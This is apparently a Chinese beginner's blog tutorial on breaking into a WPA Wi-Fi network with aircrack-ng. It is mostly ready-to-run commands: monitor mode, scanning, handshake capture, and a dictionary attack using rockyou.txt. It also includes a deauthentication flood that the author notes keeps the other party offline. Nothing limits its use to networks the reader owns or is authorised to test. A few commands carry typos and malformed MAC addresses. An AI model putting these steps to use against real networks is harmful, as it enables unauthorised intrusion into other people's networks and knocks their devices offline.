一、说明
破解成不成功就要看你的密码字典强不强大,密码字典可以在网上下载,也可以通过字典生成工具生成自己的字典,本人菜鸡第一次写,大神请绕道
二、破解
2.1、查看有无支持监听的网卡 命令:airmon-ng
可以看到wlan0支持监听模式
2.2、开启监听模式
命令:airmon-ng start wlan0
可以使用ifconfig查看是否开启成功,出现wlan0mon则说明开启成功
2.3 查看周围已存在的热点
命令:airodump-ng wlan0mon
BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率,ESSID为wifi的名称
2.4、抓取握手包
命令:airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon 如:airodump-ng --bssid 38:37:8B:DD:47: B7 -c 11 -w /root/guo/wlan0 wlan0mon
当第一行出现[WPA handshake : 38:37:8D…时,则说明抓包成功,此时可ctrl+c停止抓包 如果抓取不到数据,新建一个终端,强制连接到wifi的设备重连路由器从而抓取握手包 命令:airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(一般为wlan0mon) 如:aireplay-ng -0 0 -a 46:99:66:F9:84 -c B8:E8:56:09:CC:9C wlan0mon 记住要ctrl+c停止,不然对方会一直断网
2.5、解压kali自带的字典文件
路径:/usr/share/wordlists/rockyou.txt.gz
命令:gzip -d /usr/share/wordlists/rockyou.txt.gz
2.6、开始破解
命令: aircrack-ng -w 字典路径 握手包路径,开始
如:aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/guo/wlan0-01.cap
然后就是等待了,可能几分钟,也可能几个小时,这就根据电脑性能和密码的复杂程度了。如果不成功,可百度其他字典,再破解
